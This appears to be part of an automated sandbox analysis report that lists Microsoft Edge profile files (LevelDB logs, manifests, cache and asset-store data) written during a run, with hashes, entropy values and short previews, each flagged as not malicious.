                                                                                                                                                                                                                                                                                                        SHA-256:3DDFC1CC453E54DC5EB789B63924A3ED256B42AD2F626DEE7001BEAEF6B4850A
                                                                                                                                                                                                                                                                                                        SHA-512:9DF1CA34BE8541794F18445B71632332E5B8CF7A6A731EFD3E2BDA810F6FBAB3260C5128907CA2E2B09A8134A70443DB9921E46B75BAA6DA29496C71E7899FA3
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:32.730 1ec4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/18-08:55:32.744 1ec4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):12889
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.3790883644906335
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:jVeA7NzzQdTCu960h80CZrOCVyQbrrPI3lqLmCcWXAS:jMA7Z+60h80CZayrPI3lqSCcWQS
                                                                                                                                                                                                                                                                                                        MD5:85D87580AB59A019C5DCBB708E89CDEA
                                                                                                                                                                                                                                                                                                        SHA1:5B9FEFBB468C158893E07DBA901FC17AC7CCC06B
                                                                                                                                                                                                                                                                                                        SHA-256:63FA4FA370DCBC4AF61F91C413EE6B6915E5031BEFF2633F2ECB16B7CF717265
                                                                                                                                                                                                                                                                                                        SHA-512:F2A330B24DF9299CEBDA8740DC495315B0704FAFD939711713E7238F81B173514E54949A523C657DAFB4729CCFCC18C512E58D1475478F111582591F683A77FC
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1.8...................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340976957085123.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):331
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.15270814476135
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQEccOq2PsZ23oH+Tcwt9Eh1tIFUt8ORQEcVZmw+ORQEcCFkwOsZ23oH+Tcwt9O:721cOvkcYeb9Eh16FUt8O21V/+O21CF1
                                                                                                                                                                                                                                                                                                        MD5:A5CC2E44277248CA769BCDD68E8B5870
                                                                                                                                                                                                                                                                                                        SHA1:D61D21A5D10631C0010C431651B6DB241611077F
                                                                                                                                                                                                                                                                                                        SHA-256:3359CD23622E9FCB9856BADBEBEA2E3A72D3719AE37444716B9C6CE6BCDEEC13
                                                                                                                                                                                                                                                                                                        SHA-512:21EFC43BF45DD69926ED4690B05174E27BB8FC93686D7006351CFF4613BB741A567ABCFFF7F23C06F581465BB78F7803D5AABECEA3E969E6C37A7B0C49FE1A66
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:34.951 940 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/18-08:55:34.954 940 Recovering log #3.2024/12/18-08:55:34.957 940 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):331
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.15270814476135
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQEccOq2PsZ23oH+Tcwt9Eh1tIFUt8ORQEcVZmw+ORQEcCFkwOsZ23oH+Tcwt9O:721cOvkcYeb9Eh16FUt8O21V/+O21CF1
                                                                                                                                                                                                                                                                                                        MD5:A5CC2E44277248CA769BCDD68E8B5870
                                                                                                                                                                                                                                                                                                        SHA1:D61D21A5D10631C0010C431651B6DB241611077F
                                                                                                                                                                                                                                                                                                        SHA-256:3359CD23622E9FCB9856BADBEBEA2E3A72D3719AE37444716B9C6CE6BCDEEC13
                                                                                                                                                                                                                                                                                                        SHA-512:21EFC43BF45DD69926ED4690B05174E27BB8FC93686D7006351CFF4613BB741A567ABCFFF7F23C06F581465BB78F7803D5AABECEA3E969E6C37A7B0C49FE1A66
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:34.951 940 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/18-08:55:34.954 940 Recovering log #3.2024/12/18-08:55:34.957 940 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_1

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0018164538716206491
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zEflWV:/M/xT02zbV
                                                                                                                                                                                                                                                                                                        MD5:9F3AE56F45A6188DF26A755000191632
                                                                                                                                                                                                                                                                                                        SHA1:B2E74B1674D6FBEF33001674CF80F288DFBBB4E3
                                                                                                                                                                                                                                                                                                        SHA-256:FFC4CD9922271B01F40116C6F94A7F989FF41BA478E85A4495996148D128B6AA
                                                                                                                                                                                                                                                                                                        SHA-512:75C984797642540D0838AF25D587246D86525045F749004BDF999C5A20997210033A2F2E3ADCAADC03760D3B0452FEABD770A2F31FB06B0245B5D54BBEBAEB3B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):346
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.230831017946792
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQ1Oq2PsZ23oH+TcwtnG2tMsIFUt8ORQMSVZmw+ORQMSSF/FkwOsZ23oH+TcwtB:721OvkcYebn9GFUt8O2MSV/+O2MS2F5+
                                                                                                                                                                                                                                                                                                        MD5:3CAA438567505AAE23771602612A813C
                                                                                                                                                                                                                                                                                                        SHA1:7C2C98381168F59B9732F5855F07AE8E6D4ED6ED
                                                                                                                                                                                                                                                                                                        SHA-256:A0D4FD1323361D7F4DEF47F72935D8C801D730FA6D3183E2D5C4250ACABB0581
                                                                                                                                                                                                                                                                                                        SHA-512:2D421FDC90EE9D86AE9B58830844A23BE962A1865D7C9725DB92031F31799DA8339AC54D27D4772FC87AA0D36A491ED50F8ACA15A2DC502B14AA329A7A74D7FC
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.277 1da4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/18-08:55:33.376 1da4 Recovering log #3.2024/12/18-08:55:33.377 1da4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):346
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.230831017946792
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQ1Oq2PsZ23oH+TcwtnG2tMsIFUt8ORQMSVZmw+ORQMSSF/FkwOsZ23oH+TcwtB:721OvkcYebn9GFUt8O2MSV/+O2MS2F5+
                                                                                                                                                                                                                                                                                                        MD5:3CAA438567505AAE23771602612A813C
                                                                                                                                                                                                                                                                                                        SHA1:7C2C98381168F59B9732F5855F07AE8E6D4ED6ED
                                                                                                                                                                                                                                                                                                        SHA-256:A0D4FD1323361D7F4DEF47F72935D8C801D730FA6D3183E2D5C4250ACABB0581
                                                                                                                                                                                                                                                                                                        SHA-512:2D421FDC90EE9D86AE9B58830844A23BE962A1865D7C9725DB92031F31799DA8339AC54D27D4772FC87AA0D36A491ED50F8ACA15A2DC502B14AA329A7A74D7FC
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.277 1da4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/18-08:55:33.376 1da4 Recovering log #3.2024/12/18-08:55:33.377 1da4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old~RF2f2f1.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):346
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.230831017946792
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQ1Oq2PsZ23oH+TcwtnG2tMsIFUt8ORQMSVZmw+ORQMSSF/FkwOsZ23oH+TcwtB:721OvkcYebn9GFUt8O2MSV/+O2MS2F5+
                                                                                                                                                                                                                                                                                                        MD5:3CAA438567505AAE23771602612A813C
                                                                                                                                                                                                                                                                                                        SHA1:7C2C98381168F59B9732F5855F07AE8E6D4ED6ED
                                                                                                                                                                                                                                                                                                        SHA-256:A0D4FD1323361D7F4DEF47F72935D8C801D730FA6D3183E2D5C4250ACABB0581
                                                                                                                                                                                                                                                                                                        SHA-512:2D421FDC90EE9D86AE9B58830844A23BE962A1865D7C9725DB92031F31799DA8339AC54D27D4772FC87AA0D36A491ED50F8ACA15A2DC502B14AA329A7A74D7FC
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.277 1da4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/18-08:55:33.376 1da4 Recovering log #3.2024/12/18-08:55:33.377 1da4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):418
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                        MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                        SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                        SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                        SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):322
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.16698160033669
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQFXgUAsq2PsZ23oH+Tcwt8aPrqIFUt8ORQFXqyZmw+ORQFXq+kwOsZ23oH+TcD:72eUAsvkcYebL3FUt8O2z/+O2p51cYeo
                                                                                                                                                                                                                                                                                                        MD5:70E24C0AD3793CFE57DFCA092D2045A1
                                                                                                                                                                                                                                                                                                        SHA1:294E4A293CD1EEC5F59C7FCF1E3F9773347713E0
                                                                                                                                                                                                                                                                                                        SHA-256:E4CBC84FCF424D5CD565BA9FBB1BA41D7535C71AD7608B3E9FFEC2B37C10B447
                                                                                                                                                                                                                                                                                                        SHA-512:66AE66719436C9C3907523142DB2F7504B3125AAF34137262B8EF3877395D2489A2FED87B4AC41FFA49F4769D427AF8264DB0CDE3302BC0027455BBAA01BF80B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:42.225 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/18-08:55:42.226 1eb4 Recovering log #3.2024/12/18-08:55:42.226 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):322
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.16698160033669
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQFXgUAsq2PsZ23oH+Tcwt8aPrqIFUt8ORQFXqyZmw+ORQFXq+kwOsZ23oH+TcD:72eUAsvkcYebL3FUt8O2z/+O2p51cYeo
                                                                                                                                                                                                                                                                                                        MD5:70E24C0AD3793CFE57DFCA092D2045A1
                                                                                                                                                                                                                                                                                                        SHA1:294E4A293CD1EEC5F59C7FCF1E3F9773347713E0
                                                                                                                                                                                                                                                                                                        SHA-256:E4CBC84FCF424D5CD565BA9FBB1BA41D7535C71AD7608B3E9FFEC2B37C10B447
                                                                                                                                                                                                                                                                                                        SHA-512:66AE66719436C9C3907523142DB2F7504B3125AAF34137262B8EF3877395D2489A2FED87B4AC41FFA49F4769D427AF8264DB0CDE3302BC0027455BBAA01BF80B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:42.225 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/18-08:55:42.226 1eb4 Recovering log #3.2024/12/18-08:55:42.226 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old~RF315db.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):322
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.16698160033669
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQFXgUAsq2PsZ23oH+Tcwt8aPrqIFUt8ORQFXqyZmw+ORQFXq+kwOsZ23oH+TcD:72eUAsvkcYebL3FUt8O2z/+O2p51cYeo
                                                                                                                                                                                                                                                                                                        MD5:70E24C0AD3793CFE57DFCA092D2045A1
                                                                                                                                                                                                                                                                                                        SHA1:294E4A293CD1EEC5F59C7FCF1E3F9773347713E0
                                                                                                                                                                                                                                                                                                        SHA-256:E4CBC84FCF424D5CD565BA9FBB1BA41D7535C71AD7608B3E9FFEC2B37C10B447
                                                                                                                                                                                                                                                                                                        SHA-512:66AE66719436C9C3907523142DB2F7504B3125AAF34137262B8EF3877395D2489A2FED87B4AC41FFA49F4769D427AF8264DB0CDE3302BC0027455BBAA01BF80B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:42.225 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/18-08:55:42.226 1eb4 Recovering log #3.2024/12/18-08:55:42.226 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):418
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                        MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                        SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                        SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                        SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):326
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.173905674397623
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQFXpRFIq2PsZ23oH+Tcwt865IFUt8ORQFXE59Zmw+ORQFXE5PkwOsZ23oH+Tc4:720vkcYeb/WFUt8O2SP/+O2Sd51cYebD
                                                                                                                                                                                                                                                                                                        MD5:60F2974C78B2A00AB998802278399ACD
                                                                                                                                                                                                                                                                                                        SHA1:A6857697B5DE84135A4B0B1E189602EF00F7BAD7
                                                                                                                                                                                                                                                                                                        SHA-256:DD7360637B8D6F0F45AF0ADD8C925D3A935A12EDD56A5CBF51A3FE3F3C23BCAE
                                                                                                                                                                                                                                                                                                        SHA-512:406C9703A6A60733F61440A8BF386DCAC404EF9AE6DF396EA5004395D00F3130A7496674A3805513CB15C3AB6DB273A5219D5A6BFB60A81B13B855E5E6154FAE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:42.228 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/18-08:55:42.229 1eb4 Recovering log #3.2024/12/18-08:55:42.229 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):326
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.173905674397623
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQFXpRFIq2PsZ23oH+Tcwt865IFUt8ORQFXE59Zmw+ORQFXE5PkwOsZ23oH+Tc4:720vkcYeb/WFUt8O2SP/+O2Sd51cYebD
                                                                                                                                                                                                                                                                                                        MD5:60F2974C78B2A00AB998802278399ACD
                                                                                                                                                                                                                                                                                                        SHA1:A6857697B5DE84135A4B0B1E189602EF00F7BAD7
                                                                                                                                                                                                                                                                                                        SHA-256:DD7360637B8D6F0F45AF0ADD8C925D3A935A12EDD56A5CBF51A3FE3F3C23BCAE
                                                                                                                                                                                                                                                                                                        SHA-512:406C9703A6A60733F61440A8BF386DCAC404EF9AE6DF396EA5004395D00F3130A7496674A3805513CB15C3AB6DB273A5219D5A6BFB60A81B13B855E5E6154FAE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:42.228 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/18-08:55:42.229 1eb4 Recovering log #3.2024/12/18-08:55:42.229 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old~RF315db.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):326
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.173905674397623
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQFXpRFIq2PsZ23oH+Tcwt865IFUt8ORQFXE59Zmw+ORQFXE5PkwOsZ23oH+Tc4:720vkcYeb/WFUt8O2SP/+O2Sd51cYebD
                                                                                                                                                                                                                                                                                                        MD5:60F2974C78B2A00AB998802278399ACD
                                                                                                                                                                                                                                                                                                        SHA1:A6857697B5DE84135A4B0B1E189602EF00F7BAD7
                                                                                                                                                                                                                                                                                                        SHA-256:DD7360637B8D6F0F45AF0ADD8C925D3A935A12EDD56A5CBF51A3FE3F3C23BCAE
                                                                                                                                                                                                                                                                                                        SHA-512:406C9703A6A60733F61440A8BF386DCAC404EF9AE6DF396EA5004395D00F3130A7496674A3805513CB15C3AB6DB273A5219D5A6BFB60A81B13B855E5E6154FAE
                                                                                                                                                                                                                                                                                                        Malicious:false
